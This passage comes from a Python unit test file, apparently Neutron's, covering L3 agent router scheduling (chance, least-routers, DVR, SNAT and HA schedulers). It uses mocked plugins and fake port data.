        self.plugin.router_scheduler.bind_router(ctx, router_id, agent)
        agents = self.get_l3_agents_hosting_routers(ctx,
                                                    [router_id])
        self.assertEqual([agent.id], [agt.id for agt in agents])
        agents = self.get_l3_agents_hosting_routers(ctx,
                                                    [router_id],
                                                    admin_state_up=True)
        self.assertEqual([agent.id], [agt.id for agt in agents])

        self._set_l3_agent_admin_state(ctx, agent.id, False)
        agents = self.get_l3_agents_hosting_routers(ctx,
                                                    [router_id])
        self.assertEqual([agent.id], [agt.id for agt in agents])
        agents = self.get_l3_agents_hosting_routers(ctx,
                                                    [router_id],
                                                    admin_state_up=True)
        self.assertEqual([], agents)
class L3SchedulerTestCaseMixin(l3_agentschedulers_db.L3AgentSchedulerDbMixin,
                               l3_db.L3_NAT_db_mixin,
                               common_db_mixin.CommonDbMixin,
                               test_l3.L3NatTestCaseMixin,
                               L3SchedulerBaseMixin,
                               L3SchedulerTestBaseMixin):
    """Wires the shared scheduler tests up against a real plugin and DB."""

    def setUp(self):
        self.mock_rescheduling = False
        ext_mgr = test_l3.L3TestExtensionManager()
        plugin_str = ('neutron.tests.unit.extensions.test_l3.'
                      'TestL3NatIntAgentSchedulingPlugin')
        super(L3SchedulerTestCaseMixin, self).setUp(plugin=plugin_str,
                                                    ext_mgr=ext_mgr)

        self.adminContext = n_context.get_admin_context()
        self.plugin = manager.NeutronManager.get_plugin()
        # Default scheduler; subclasses may swap in a different one.
        self.plugin.router_scheduler = importutils.import_object(
            'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
        )
        self._register_l3_agents()
class L3AgentChanceSchedulerTestCase(L3SchedulerTestCaseMixin,
                                     test_db_base_plugin_v2.
                                     NeutronDbPluginV2TestCase):
    """Tests for ChanceScheduler (random placement) router scheduling."""

    def test_random_scheduling(self):
        # Fix: use the mock.patch context manager instead of an explicit
        # start()/stop() pair.  The original stopped the patcher only at the
        # end of the test body, so any failing assertion leaked the patched
        # random.choice into every subsequent test in the process.
        with mock.patch('random.choice') as random_mock:

            def side_effect(seq):
                # Deterministic "random": always pick the first candidate.
                return seq[0]
            random_mock.side_effect = side_effect

            with self.subnet() as subnet:
                self._set_net_external(subnet['subnet']['network_id'])
                with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
                    agents = self.get_l3_agents_hosting_routers(
                        self.adminContext, [r1['router']['id']],
                        admin_state_up=True)

                    self.assertEqual(len(agents), 1)
                    self.assertEqual(random_mock.call_count, 1)

                    with self.router_with_ext_gw(name='r2',
                                                 subnet=subnet) as r2:
                        agents = self.get_l3_agents_hosting_routers(
                            self.adminContext, [r2['router']['id']],
                            admin_state_up=True)

                        self.assertEqual(len(agents), 1)
                        self.assertEqual(random_mock.call_count, 2)

    def test_scheduler_auto_schedule_when_agent_added(self):
        """A router is picked up once an agent on the host is re-enabled."""
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id1, False)
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id2, False)

        with self.subnet() as subnet:
            self._set_net_external(subnet['subnet']['network_id'])
            with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
                # With every agent disabled, nothing hosts the router yet.
                agents = self.get_l3_agents_hosting_routers(
                    self.adminContext, [r1['router']['id']],
                    admin_state_up=True)
                self.assertEqual(0, len(agents))

                self._set_l3_agent_admin_state(self.adminContext,
                                               self.agent_id1, True)
                self.plugin.auto_schedule_routers(self.adminContext,
                                                  'host_1',
                                                  [r1['router']['id']])

                agents = self.get_l3_agents_hosting_routers(
                    self.adminContext, [r1['router']['id']],
                    admin_state_up=True)
                self.assertEqual('host_1', agents[0]['host'])
class L3AgentLeastRoutersSchedulerTestCase(L3SchedulerTestCaseMixin,
                                           test_db_base_plugin_v2.
                                           NeutronDbPluginV2TestCase):
    """Tests for the LeastRoutersScheduler placement strategy."""

    def setUp(self):
        super(L3AgentLeastRoutersSchedulerTestCase, self).setUp()
        # Replace the default ChanceScheduler installed by the mixin.
        self.plugin.router_scheduler = importutils.import_object(
            'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
        )

    def test_scheduler(self):
        # disable one agent to force the scheduling to the only one.
        self._set_l3_agent_admin_state(self.adminContext,
                                       self.agent_id2, False)

        with self.subnet() as subnet:
            self._set_net_external(subnet['subnet']['network_id'])
            with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
                agents = self.get_l3_agents_hosting_routers(
                    self.adminContext, [r1['router']['id']],
                    admin_state_up=True)
                self.assertEqual(len(agents), 1)

                agent_id1 = agents[0]['id']

                with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
                    agents = self.get_l3_agents_hosting_routers(
                        self.adminContext, [r2['router']['id']],
                        admin_state_up=True)
                    self.assertEqual(len(agents), 1)

                    agent_id2 = agents[0]['id']

                    # Both routers must land on the single enabled agent.
                    self.assertEqual(agent_id1, agent_id2)

                    # re-enable the second agent to see whether the next router
                    # spawned will be on this one.
                    self._set_l3_agent_admin_state(self.adminContext,
                                                   self.agent_id2, True)

                    with self.router_with_ext_gw(name='r3',
                                                 subnet=subnet) as r3:
                        agents = self.get_l3_agents_hosting_routers(
                            self.adminContext, [r3['router']['id']],
                            admin_state_up=True)
                        self.assertEqual(len(agents), 1)

                        agent_id3 = agents[0]['id']

                        self.assertNotEqual(agent_id1, agent_id3)
class L3DvrScheduler(l3_db.L3_NAT_db_mixin,
                     l3_dvrscheduler_db.L3_DVRsch_db_mixin):
    """Concrete combination of the NAT db mixin and the DVR scheduler mixin,
    used as the device under test below."""
    pass
class L3DvrSchedulerTestCase(testlib_api.SqlTestCase):
    """Tests for the DVR scheduling helpers of L3_DVRsch_db_mixin.

    The device under test (``self.dut``) is an L3DvrScheduler; its
    collaborators (core plugin, agent db, RPC notifiers, SQLAlchemy
    queries) are mocked per test.
    """

    def setUp(self):
        plugin = 'neutron.plugins.ml2.plugin.Ml2Plugin'
        self.setup_coreplugin(plugin)
        super(L3DvrSchedulerTestCase, self).setUp()
        self.adminContext = n_context.get_admin_context()
        self.dut = L3DvrScheduler()

    def test__notify_port_delete(self):
        # A port delete carrying 'removed_routers' must both update the
        # ARP table ('del') and unschedule the router from the named agent.
        plugin = manager.NeutronManager.get_plugin()
        l3plugin = mock.Mock()
        l3plugin.supported_extension_aliases = [
            'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
            constants.L3_DISTRIBUTED_EXT_ALIAS
        ]
        with mock.patch.object(manager.NeutronManager,
                               'get_service_plugins',
                               return_value={'L3_ROUTER_NAT': l3plugin}):
            kwargs = {
                'context': self.adminContext,
                'port': mock.ANY,
                'removed_routers': [
                    {'agent_id': 'foo_agent', 'router_id': 'foo_id'},
                ],
            }
            l3_dvrscheduler_db._notify_port_delete(
                'port', 'after_delete', plugin, **kwargs)
            l3plugin.dvr_vmarp_table_update.assert_called_once_with(
                self.adminContext, mock.ANY, 'del')
            l3plugin.remove_router_from_l3_agent.assert_called_once_with(
                self.adminContext, 'foo_agent', 'foo_id')

    def test_dvr_update_router_addvm(self):
        # Smoke test: adding a VM port on a subnet with a distributed
        # router interface must not raise.
        port = {
                'device_id': 'abcd',
                'device_owner': 'compute:nova',
                'fixed_ips': [
                    {
                        'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
                        'ip_address': '10.10.10.3'
                    }
                ]
        }
        dvr_port = {
                'id': 'dvr_port1',
                'device_id': 'r1',
                'device_owner': 'network:router_interface_distributed',
                'fixed_ips': [
                    {
                        'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
                        'ip_address': '10.10.10.1'
                    }
                ]
        }
        r1 = {
              'id': 'r1',
              'distributed': True,
        }
        with mock.patch(
                'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
                return_value=[dvr_port]),\
                mock.patch(
                    'neutron.manager.NeutronManager.get_service_plugins',
                    return_value=mock.Mock()),\
                mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
                           return_value=r1),\
                mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
                           '.L3AgentNotifyAPI'):
            self.dut.dvr_update_router_addvm(self.adminContext, port)

    def test_get_dvr_routers_by_portid(self):
        # The DVR interface port's device_id is the router id.
        dvr_port = {
                'id': 'dvr_port1',
                'device_id': 'r1',
                'device_owner': 'network:router_interface_distributed',
                'fixed_ips': [
                    {
                        'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
                        'ip_address': '10.10.10.1'
                    }
                ]
        }
        r1 = {
              'id': 'r1',
              'distributed': True,
        }
        with mock.patch(
                'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_port',
                return_value=dvr_port),\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
                           '.get_ports', return_value=[dvr_port]):
            router_id = self.dut.get_dvr_routers_by_portid(self.adminContext,
                                                           dvr_port['id'])
            self.assertEqual(router_id.pop(), r1['id'])

    def test_get_subnet_ids_on_router(self):
        dvr_port = {
                'id': 'dvr_port1',
                'device_id': 'r1',
                'device_owner': 'network:router_interface_distributed',
                'fixed_ips': [
                    {
                        'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
                        'ip_address': '10.10.10.1'
                    }
                ]
        }
        r1 = {
              'id': 'r1',
              'distributed': True,
        }
        with mock.patch(
                'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
                return_value=[dvr_port]):
            sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
                                                        r1['id'])
            self.assertEqual(sub_ids.pop(),
                            dvr_port.get('fixed_ips').pop(0).get('subnet_id'))

    def _test_check_ports_on_host_and_subnet_base(self, port_status):
        # check_ports_on_host_and_subnet must report True for a serviceable
        # VM port on the host/subnet regardless of the port's status.
        dvr_port = {
                'id': 'fake_id',
                'device_id': 'r1',
                'status': port_status,
                'binding:host_id': 'thisHost',
                'device_owner': 'compute:nova',
                'fixed_ips': [
                    {
                        'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
                        'ip_address': '10.10.10.1'
                    }
                ]
        }
        r1 = {
              'id': 'r1',
              'distributed': True,
        }
        with mock.patch(
                'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
                return_value=[dvr_port]),\
                mock.patch(
                    'neutron.manager.NeutronManager.get_service_plugins',
                    return_value=mock.Mock()),\
                mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
                           return_value=r1),\
                mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
                           '.L3AgentNotifyAPI'):
            sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
                                                        r1['id'])
            result = self.dut.check_ports_on_host_and_subnet(
                                                    self.adminContext,
                                                    'thisHost', 'dvr_port1',
                                                    sub_ids)
            self.assertTrue(result)

    def test_check_ports_on_host_and_subnet_with_active_port(self):
        self._test_check_ports_on_host_and_subnet_base('ACTIVE')

    def test_check_ports_on_host_and_subnet_with_build_port(self):
        self._test_check_ports_on_host_and_subnet_base('BUILD')

    def test_check_ports_on_host_and_subnet_with_down_port(self):
        self._test_check_ports_on_host_and_subnet_base('DOWN')

    def _test_dvr_serviced_port_exists_on_subnet(self, port):
        # Helper: a DVR-serviced port type on the subnet keeps it serviced.
        with mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                        'get_ports', return_value=[port]):
            result = self.dut.check_ports_on_host_and_subnet(
                                                    self.adminContext,
                                                    'thisHost',
                                                    'dvr1-intf-id',
                                                    'my-subnet-id')
            self.assertTrue(result)

    def test_dvr_serviced_vip_port_exists_on_subnet(self):
        # LBaaS VIP ports count as DVR-serviced ports.
        vip_port = {
                'id': 'lbaas-vip-port1',
                'device_id': 'vip-pool-id',
                'status': 'ACTIVE',
                'binding:host_id': 'thisHost',
                'device_owner': constants.DEVICE_OWNER_LOADBALANCER,
                'fixed_ips': [
                    {
                        'subnet_id': 'my-subnet-id',
                        'ip_address': '10.10.10.1'
                    }
                ]
        }
        self._test_dvr_serviced_port_exists_on_subnet(port=vip_port)

    def _create_port(self, port_name, tenant_id, host, subnet_id, ip_address,
                     status='ACTIVE',
                     device_owner='compute:nova'):
        # Builds a port dict in the shape returned by get_port(s); the id
        # is derived from port_name so tests can recover it.
        return {
            'id': port_name + '-port-id',
            'tenant_id': tenant_id,
            'device_id': port_name,
            'device_owner': device_owner,
            'status': status,
            'binding:host_id': host,
            'fixed_ips': [
                {
                    'subnet_id': subnet_id,
                    'ip_address': ip_address
                }
            ]
        }

    def test_dvr_deletens_if_no_port_no_routers(self):
        # Delete a vm port, the port subnet has no router interface.
        vm_tenant_id = 'tenant-1'
        my_context = n_context.Context('user-1', vm_tenant_id, is_admin=False)
        vm_port_host = 'compute-node-1'
        vm_port = self._create_port(
            'deleted-vm', vm_tenant_id, vm_port_host,
            'shared-subnet', '10.10.10.3',
            status='INACTIVE')
        vm_port_id = vm_port['id']
        fakePortDB = FakePortDB([vm_port])
        with mock.patch.object(my_context,
                               'elevated',
                               return_value=self.adminContext),\
                mock.patch(
                    'neutron.plugins.ml2.db.get_port_binding_host',
                    return_value=vm_port_host) as mock_get_port_binding_host,\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_ports', side_effect=fakePortDB.get_ports),\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_port', return_value=vm_port):
            routers = self.dut.dvr_deletens_if_no_port(my_context, vm_port_id)
            # No DVR interface on the subnet -> nothing to unschedule.
            self.assertEqual([], routers)
            # The port binding lookup must run under the elevated context.
            mock_get_port_binding_host.assert_called_once_with(
                self.adminContext.session, vm_port_id)

    def test_dvr_deletens_if_no_ports_no_removeable_routers(self):
        # A VM port is deleted, but the router can't be unscheduled from the
        # compute node because there is another VM port present.
        vm_tenant_id = 'tenant-1'
        my_context = n_context.Context('user-1', vm_tenant_id, is_admin=False)
        # NOTE(review): the trailing comma makes this a 1-tuple, not a str;
        # it works only because mocks never inspect the value — consider
        # dropping the comma.
        shared_subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
        vm_port_host = 'compute-node-1'
        dvr_port = self._create_port(
            'dvr-router', 'admin-tenant', vm_port_host,
            shared_subnet_id, '10.10.10.1',
            device_owner=constants.DEVICE_OWNER_DVR_INTERFACE)
        deleted_vm_port = self._create_port(
            'deleted-vm', vm_tenant_id, vm_port_host,
            shared_subnet_id, '10.10.10.3',
            status='INACTIVE')
        deleted_vm_port_id = deleted_vm_port['id']
        running_vm_port = self._create_port(
            'running-vn', 'tenant-2', vm_port_host,
            shared_subnet_id, '10.10.10.33')
        fakePortDB = FakePortDB([running_vm_port, deleted_vm_port, dvr_port])
        vm_port_binding = {
            'port_id': deleted_vm_port_id,
            'host': vm_port_host
        }
        with mock.patch.object(my_context,
                               'elevated',
                               return_value=self.adminContext),\
                mock.patch(
                    'neutron.plugins.ml2.db.get_port_binding_host',
                    return_value=vm_port_host) as mock_get_port_binding_host,\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_port', side_effect=fakePortDB.get_port),\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_ports', side_effect=fakePortDB.get_ports) as\
                mock_get_ports,\
                mock.patch('neutron.plugins.ml2.db.'
                           'get_dvr_port_binding_by_host',
                           return_value=vm_port_binding) as\
                mock_get_dvr_port_binding_by_host:
            routers = self.dut.dvr_deletens_if_no_port(
                my_context, deleted_vm_port_id)
            # running_vm_port still needs the router on this host.
            self.assertEqual([], routers)
            mock_get_port_binding_host.assert_called_once_with(
                self.adminContext.session, deleted_vm_port_id)
            self.assertTrue(mock_get_ports.called)
            # Short-circuits before ever touching the DVR port binding.
            self.assertFalse(mock_get_dvr_port_binding_by_host.called)

    def _test_dvr_deletens_if_no_ports_delete_routers(self,
                                                      vm_tenant,
                                                      router_tenant):
        # Last VM on the host/subnet is removed -> the DVR router must be
        # reported for unscheduling from this compute node's l3 agent.
        class FakeAgent(object):
            def __init__(self, id, host, agent_type):
                self.id = id
                self.host = host
                self.agent_type = agent_type

        my_context = n_context.Context('user-1', vm_tenant, is_admin=False)
        # NOTE(review): trailing comma -> 1-tuple (see sibling test).
        shared_subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
        vm_port_host = 'compute-node-1'
        router_id = 'dvr-router'
        dvr_port = self._create_port(
            router_id, router_tenant, vm_port_host,
            shared_subnet_id, '10.10.10.1',
            device_owner=constants.DEVICE_OWNER_DVR_INTERFACE)
        dvr_port_id = dvr_port['id']
        deleted_vm_port = self._create_port(
            'deleted-vm', vm_tenant, vm_port_host,
            shared_subnet_id, '10.10.10.3',
            status='INACTIVE')
        deleted_vm_port_id = deleted_vm_port['id']
        # The remaining VM lives on a different host, so it does not keep
        # the router scheduled on vm_port_host.
        running_vm_port = self._create_port(
            'running-vn', vm_tenant, 'compute-node-2',
            shared_subnet_id, '10.10.10.33')
        fakePortDB = FakePortDB([running_vm_port, dvr_port, deleted_vm_port])
        dvr_port_binding = {
            'port_id': dvr_port_id, 'host': vm_port_host
        }
        agent_id = 'l3-agent-on-compute-node-1'
        l3_agent_on_vm_host = FakeAgent(agent_id,
                                        vm_port_host,
                                        constants.AGENT_TYPE_L3)
        with mock.patch.object(my_context,
                               'elevated',
                               return_value=self.adminContext),\
                mock.patch(
                    'neutron.plugins.ml2.db.get_port_binding_host',
                    return_value=vm_port_host) as mock_get_port_binding_host,\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_port', side_effect=fakePortDB.get_port),\
                mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.'
                           'get_ports', side_effect=fakePortDB.get_ports) as\
                mock_get_ports,\
                mock.patch('neutron.plugins.ml2.db.'
                           'get_dvr_port_binding_by_host',
                           return_value=dvr_port_binding) as\
                mock_get_dvr_port_binding_by_host,\
                mock.patch('neutron.db.agents_db.AgentDbMixin.'
                           '_get_agent_by_type_and_host',
                           return_value=l3_agent_on_vm_host):
            routers = self.dut.dvr_deletens_if_no_port(
                my_context, deleted_vm_port_id)
            expected_router = {
                'router_id': router_id,
                'host': vm_port_host,
                'agent_id': agent_id
            }
            self.assertEqual([expected_router], routers)
            mock_get_port_binding_host.assert_called_once_with(
                self.adminContext.session, deleted_vm_port_id)
            self.assertTrue(mock_get_ports.called)
            mock_get_dvr_port_binding_by_host.assert_called_once_with(
                my_context.session, dvr_port_id, vm_port_host)

    def test_dvr_deletens_if_no_ports_delete_admin_routers(self):
        # test to see whether the last VM using a router created
        # by the admin will be unscheduled on the compute node
        self._test_dvr_deletens_if_no_ports_delete_routers(
            'tenant-1', 'admin-tenant')

    def test_dvr_deletens_if_no_ports_delete_tenant_routers(self):
        # test to see whether the last VM using a tenant's private
        # router will be unscheduled on the compute node
        self._test_dvr_deletens_if_no_ports_delete_routers(
            'tenant-1', 'tenant-1')

    def test_dvr_serviced_dhcp_port_exists_on_subnet(self):
        # DHCP ports count as DVR-serviced ports.
        dhcp_port = {
                'id': 'dhcp-port1',
                'device_id': 'dhcp-net-id',
                'status': 'ACTIVE',
                'binding:host_id': 'thisHost',
                'device_owner': constants.DEVICE_OWNER_DHCP,
                'fixed_ips': [
                    {
                        'subnet_id': 'my-subnet-id',
                        'ip_address': '10.10.10.2'
                    }
                ]
        }
        self._test_dvr_serviced_port_exists_on_subnet(port=dhcp_port)

    def _prepare_schedule_snat_tests(self):
        # Returns a live (admin-up, recently heartbeating) agent plus a
        # distributed router with SNAT enabled on its external gateway.
        agent = agents_db.Agent()
        agent.admin_state_up = True
        agent.heartbeat_timestamp = timeutils.utcnow()
        router = {
            'id': 'foo_router_id',
            'distributed': True,
            'external_gateway_info': {
                'network_id': str(uuid.uuid4()),
                'enable_snat': True
            }
        }
        return agent, router

    def test_schedule_snat_router_duplicate_entry(self):
        # A DBDuplicateEntry while binding SNAT must be swallowed and must
        # not fall through to binding the DVR router.
        self._prepare_schedule_snat_tests()
        with mock.patch.object(self.dut, 'get_l3_agents'),\
                mock.patch.object(self.dut, 'get_snat_candidates'),\
                mock.patch.object(
                    self.dut,
                    'bind_snat_servicenode',
                    side_effect=db_exc.DBDuplicateEntry()) as mock_bind_snat,\
                mock.patch.object(
                    self.dut,
                    'bind_dvr_router_servicenode') as mock_bind_dvr:
            self.dut.schedule_snat_router(self.adminContext, 'foo', 'bar')
            self.assertTrue(mock_bind_snat.called)
            self.assertFalse(mock_bind_dvr.called)

    def test_schedule_snat_router_return_value(self):
        # schedule_snat_router propagates bind_snat_servicenode's result.
        agent, router = self._prepare_schedule_snat_tests()
        with mock.patch.object(self.dut, 'get_l3_agents'),\
                mock.patch.object(
                    self.dut,
                    'get_snat_candidates') as mock_snat_canidates,\
                mock.patch.object(self.dut,
                                  'bind_snat_servicenode') as mock_bind_snat,\
                mock.patch.object(
                    self.dut,
                    'bind_dvr_router_servicenode') as mock_bind_dvr:
            mock_snat_canidates.return_value = [agent]
            mock_bind_snat.return_value = [agent]
            mock_bind_dvr.return_value = [agent]
            chosen_agent = self.dut.schedule_snat_router(
                self.adminContext, 'foo_router_id', router)
        self.assertEqual(chosen_agent, [agent])

    def test_schedule_router_unbind_snat_servicenode_negativetest(self):
        # Router without a gateway and without SNAT bindings: nothing to
        # unbind.
        router = {
            'id': 'foo_router_id',
            'distributed': True
        }
        with mock.patch.object(self.dut, 'get_router') as mock_rd,\
                mock.patch.object(self.dut,
                                  'get_snat_bindings') as mock_snat_bind,\
                mock.patch.object(self.dut,
                                  'unbind_snat_servicenode') as mock_unbind:
            mock_rd.return_value = router
            mock_snat_bind.return_value = False
            self.dut.schedule_snat_router(
                self.adminContext, 'foo_router_id', router)
            self.assertFalse(mock_unbind.called)

    def test_schedule_snat_router_with_snat_candidates(self):
        # With an unbound router and a candidate agent, the candidate gets
        # the SNAT binding.
        agent, router = self._prepare_schedule_snat_tests()
        with mock.patch.object(query.Query, 'first') as mock_query,\
                mock.patch.object(self.dut, 'get_l3_agents') as mock_agents,\
                mock.patch.object(self.dut,
                                  'get_snat_candidates') as mock_candidates,\
                mock.patch.object(self.dut, 'get_router') as mock_rd,\
                mock.patch.object(self.dut, 'bind_dvr_router_servicenode'),\
                mock.patch.object(self.dut,
                                  'bind_snat_servicenode') as mock_bind:
            mock_rd.return_value = router
            mock_query.return_value = []
            mock_agents.return_value = [agent]
            mock_candidates.return_value = [agent]
            self.dut.schedule_snat_router(
                self.adminContext, 'foo_router_id', mock.ANY)
            mock_bind.assert_called_once_with(
                self.adminContext, 'foo_router_id', [agent])

    def test_unbind_snat_servicenode(self):
        # Unbinding must delete the binding row and notify via the core
        # plugin / l3 RPC notifier properties exactly once each.
        router_id = 'foo_router_id'
        core_plugin = mock.PropertyMock()
        type(self.dut)._core_plugin = core_plugin
        (self.dut._core_plugin.get_ports_on_host_by_subnet.
         return_value) = []
        core_plugin.reset_mock()
        l3_notifier = mock.PropertyMock()
        type(self.dut).l3_rpc_notifier = l3_notifier
        binding = l3_dvrscheduler_db.CentralizedSnatL3AgentBinding(
            router_id=router_id, l3_agent_id='foo_l3_agent_id',
            l3_agent=agents_db.Agent())
        with mock.patch.object(query.Query, 'one') as mock_query,\
                mock.patch.object(self.adminContext.session,
                                  'delete') as mock_session,\
                mock.patch.object(query.Query, 'delete') as mock_delete,\
                mock.patch.object(
                    self.dut,
                    'get_subnet_ids_on_router') as mock_get_subnets:
            mock_query.return_value = binding
            mock_get_subnets.return_value = ['foo_subnet_id']
            self.dut.unbind_snat_servicenode(self.adminContext, router_id)
            mock_get_subnets.assert_called_with(self.adminContext, router_id)
            self.assertTrue(mock_session.call_count)
            self.assertTrue(mock_delete.call_count)
            core_plugin.assert_called_once_with()
            l3_notifier.assert_called_once_with()
class L3HAPlugin(db_v2.NeutronDbPluginV2,
                 l3_hamode_db.L3_HA_NAT_db_mixin,
                 l3_hascheduler_db.L3_HA_scheduler_db_mixin):
    """Core plugin with HA-router support; the plugin used by the HA
    scheduler test cases below."""
    supported_extension_aliases = ["l3-ha"]
class L3HATestCaseMixin(testlib_api.SqlTestCase,
                        L3SchedulerBaseMixin):
    """Shared fixture for HA scheduler tests: sets up an L3HAPlugin with
    the ChanceScheduler and registers l3 agents."""

    def setUp(self):
        super(L3HATestCaseMixin, self).setUp()
        self.adminContext = n_context.get_admin_context()
        self.plugin = L3HAPlugin()
        self.setup_coreplugin('neutron.plugins.ml2.plugin.Ml2Plugin')
        # Silence HA interface notifications for the whole test.
        mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
                          '_notify_ha_interfaces_updated').start()
        # 0 presumably lifts the per-router agent cap — see config docs.
        cfg.CONF.set_override('max_l3_agents_per_router', 0)
        self.plugin.router_scheduler = importutils.import_object(
            'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
        )
        self._register_l3_agents()

    def _create_ha_router(self, ha=True, tenant_id='tenant1'):
        """Create a router; ha=None omits the 'ha' key entirely."""
        self.adminContext.tenant_id = tenant_id
        router = {'name': 'router1', 'admin_state_up': True}
        if ha is not None:
            router['ha'] = ha
        return self.plugin.create_router(self.adminContext,
                                         {'router': router})
class L3_HA_scheduler_db_mixinTestCase(L3HATestCaseMixin):
    """Tests for the query helpers in L3_HA_scheduler_db_mixin."""

    def _register_l3_agents(self, plugin=None):
        # Four agents total: the mixin registers host_1/host_2, plus two
        # more here.
        super(L3_HA_scheduler_db_mixinTestCase,
              self)._register_l3_agents(plugin=plugin)
        self.agent3 = helpers.register_l3_agent(host='host_3')
        self.agent_id3 = self.agent3.id
        self.agent4 = helpers.register_l3_agent(host='host_4')
        self.agent_id4 = self.agent4.id

    def test_get_ha_routers_l3_agents_count(self):
        router1 = self._create_ha_router()
        router2 = self._create_ha_router()
        router3 = self._create_ha_router(ha=False)
        self.plugin.schedule_router(self.adminContext, router1['id'])
        self.plugin.schedule_router(self.adminContext, router2['id'])
        self.plugin.schedule_router(self.adminContext, router3['id'])
        result = self.plugin.get_ha_routers_l3_agents_count(
            self.adminContext).all()
        # Only the two HA routers appear, each with an agent count of 4.
        self.assertEqual(2, len(result))
        self.assertIn((router1['id'], router1['tenant_id'], 4), result)
        self.assertIn((router2['id'], router2['tenant_id'], 4), result)
        self.assertNotIn((router3['id'], router3['tenant_id'], mock.ANY),
                         result)

    def test_get_ordered_l3_agents_by_num_routers(self):
        router1 = self._create_ha_router()
        router2 = self._create_ha_router()
        router3 = self._create_ha_router(ha=False)
        router4 = self._create_ha_router(ha=False)
        # Agent 1 will host 0 routers, agent 2 will host 1, agent 3 will
        # host 2, and agent 4 will host 3.
        self.plugin.schedule_router(self.adminContext, router1['id'],
                                    candidates=[self.agent2, self.agent4])
        self.plugin.schedule_router(self.adminContext, router2['id'],
                                    candidates=[self.agent3, self.agent4])
        self.plugin.schedule_router(self.adminContext, router3['id'],
                                    candidates=[self.agent3])
        self.plugin.schedule_router(self.adminContext, router4['id'],
                                    candidates=[self.agent4])
        agent_ids = [self.agent_id1, self.agent_id2, self.agent_id3,
                     self.agent_id4]
        result = self.plugin.get_l3_agents_ordered_by_num_routers(
            self.adminContext, agent_ids)
        # Expect least-loaded first, i.e. agent 1, 2, 3, 4.
        self.assertEqual(agent_ids, [record['id'] for record in result])
class L3AgentSchedulerDbMixinTestCase(L3HATestCaseMixin):
    """HA-specific behavior of the generic agent-scheduler db mixin."""

    def test_reschedule_ha_routers_from_down_agents(self):
        router = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, router['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [router['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))
        self._set_l3_agent_dead(self.agent_id1)
        with mock.patch.object(self.plugin, 'reschedule_router') as reschedule:
            self.plugin.reschedule_routers_from_down_agents()
            # HA routers must NOT be rescheduled away from a dead agent.
            self.assertFalse(reschedule.called)

    def test_list_l3_agents_hosting_ha_router(self):
        router = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, router['id'])
        # Before any state report every hosting agent is 'standby'.
        agents = self.plugin.list_l3_agents_hosting_router(
            self.adminContext, router['id'])['agents']
        for agent in agents:
            self.assertEqual('standby', agent['ha_state'])
        self.plugin.update_routers_states(
            self.adminContext, {router['id']: 'active'}, self.agent1.host)
        # Only the reporting agent flips to 'active'.
        agents = self.plugin.list_l3_agents_hosting_router(
            self.adminContext, router['id'])['agents']
        for agent in agents:
            expected_state = ('active' if agent['host'] == self.agent1.host
                              else 'standby')
            self.assertEqual(expected_state, agent['ha_state'])

    def test_list_l3_agents_hosting_legacy_router(self):
        # Legacy (non-HA) routers have no HA state at all.
        router = self._create_ha_router(ha=False)
        self.plugin.schedule_router(self.adminContext, router['id'])
        agents = self.plugin.list_l3_agents_hosting_router(
            self.adminContext, router['id'])['agents']
        for agent in agents:
            self.assertIsNone(agent['ha_state'])

    def test_get_agents_dict_for_router_unscheduled_returns_empty_list(self):
        self.assertEqual({'agents': []},
                         self.plugin._get_agents_dict_for_router([]))
class L3HAChanceSchedulerTestCase(L3HATestCaseMixin):
    """ChanceScheduler behavior for HA routers (multi-agent binding)."""

    def test_scheduler_with_ha_enabled(self):
        router = self._create_ha_router()
        self.plugin.schedule_router(self.adminContext, router['id'])
        agents = self.plugin.get_l3_agents_hosting_routers(
            self.adminContext, [router['id']],
            admin_state_up=True)
        self.assertEqual(2, len(agents))

        # Each hosting agent must receive sync data with an HA interface.
        for agent in agents:
            sync_data = self.plugin.get_ha_sync_data_for_host(
                self.adminContext, router_ids=[router['id']],
                host=agent.host)
            self.assertEqual(1, len(sync_data))
            interface = sync_data[0][constants.HA_INTERFACE_KEY]
            self.assertIsNotNone(interface)

    def test_auto_schedule(self):
